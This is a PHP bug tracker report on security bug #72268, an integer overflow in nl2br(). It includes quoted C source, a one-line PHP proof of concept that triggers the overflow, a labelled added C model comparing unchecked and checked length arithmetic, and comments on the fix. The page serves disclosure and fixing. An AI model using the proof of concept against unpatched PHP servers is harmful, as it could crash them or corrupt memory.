Sec Bug #72268 Integer Overflow in nl2br()
Submitted: 2016-05-26 15:53 UTC Modified: 2016-07-07 09:34 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.36 OS:
Private report: No CVE-ID: None


 [2016-05-26 15:53 UTC] taoguangchen at icloud dot com
	/* in brief this inserts <br /> or <br> before matched regexp \n\r?|\r\n? */
	char		*tmp, *str;
	int		new_length;
	char		*end, *target;
	int		repl_cnt = 0;
	int		str_len;
	zend_bool	is_xhtml = 1;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|b", &str, &str_len, &is_xhtml) == FAILURE) {
		return;
	}

	/* ... scan of the input that counts line breaks into repl_cnt elided ... */

		size_t repl_len = is_xhtml ? (sizeof("<br />") - 1) : (sizeof("<br>") - 1);

		new_length = str_len + repl_cnt * repl_len; // ==> integer overflow: int result of str_len + repl_cnt * repl_len

	/* ... copy into the output buffer elided ... */

		RETURN_STRINGL(tmp, new_length, 0);


<?php
ini_set('memory_limit', -1);
// about 306 million "\n" bytes; each grows by 6 bytes ("<br />"), so str_len + repl_cnt * 6 exceeds INT_MAX
$str = nl2br(str_repeat("\n", 0xffffffff/14+1));


checking new_length
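Added example (not PHP's code and not part of the report): a C model of the length arithmetic above, fed the constructed sizes from the PoC, with the unchecked int computation beside a checked version that refuses an output that would not fit. For an input made only of "\n" every byte is a match, so repl_cnt equals str_len; function names are assumptions.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* The arithmetic as reported: the result lands in a 32-bit int, so
 * str_len + repl_cnt * repl_len silently wraps once it exceeds INT_MAX.
 * Modelled with uint32_t so the wrap is deterministic on any host. */
int32_t nl2br_len_unchecked(int32_t str_len, int32_t repl_cnt, uint32_t repl_len)
{
    uint32_t new_length = (uint32_t)str_len + (uint32_t)repl_cnt * repl_len;
    return (int32_t)new_length;   /* negative or far too small after a wrap */
}

/* Hardened form: each step is checked for overflow and the total must still
 * fit the int that RETURN_STRINGL takes. Returns -1 when the output would not
 * fit; the caller must then refuse the request instead of allocating. */
long long nl2br_len_checked(size_t str_len, size_t repl_cnt, size_t repl_len)
{
    if (repl_len != 0 && repl_cnt > SIZE_MAX / repl_len)
        return -1;                          /* repl_cnt * repl_len overflows */
    size_t grown = repl_cnt * repl_len;
    if (grown > SIZE_MAX - str_len)
        return -1;                          /* + str_len overflows */
    size_t total = grown + str_len;
    if (total > (size_t)INT_MAX)
        return -1;                          /* does not fit an int */
    return (long long)total;
}

/* Newline count from the report's PoC: str_repeat("\n", 0xffffffff/14+1).
 * With repl_len == 6 ("<br />") each input byte needs 7 output bytes, which
 * is just past INT_MAX; with repl_len == 4 ("<br>") it still fits. */
int32_t poc_newline_count(void)
{
    return (int32_t)(0xffffffffULL / 14 + 1);   /* 306783379 */
}

int main(void)
{
    int32_t n = poc_newline_count();
    printf("PoC input bytes:                 %d\n", n);
    printf("unchecked new_length (<br />):   %d\n", nl2br_len_unchecked(n, n, 6));
    printf("checked new_length   (<br />):   %lld\n", nl2br_len_checked(n, n, 6));
    printf("checked new_length   (<br>):     %lld\n", nl2br_len_checked(n, n, 4));
    return 0;
}
```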


 [2016-06-16 04:53 UTC]
-Assigned To: +Assigned To: stas
 [2016-06-16 04:53 UTC]
See bug #72403
 [2016-06-21 06:53 UTC]
-Status: Assigned +Status: Closed
 [2016-06-21 06:53 UTC]
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at

 For Windows:
Thank you for the report, and for helping us make PHP better.

 [2016-07-06 16:03 UTC] php-e1b at deemzed dot uk
The fix for bug #72268 has not made it into the official PHP 5.5.37, PHP 5.6.23 releases as indicated by announce/in the changelogs, PHP_FUNCTION(nl2br):

        int             new_length;
 [2016-07-07 09:34 UTC]
A follow up fix is in the scope of bug #72403, see 25bd11cf271f801efa346195d540f3d8e3bcb0ef.

PHP Copyright © 2001-2018 The PHP Group
All rights reserved.
Last updated: Wed Sep 19 20:01:27 2018 UTC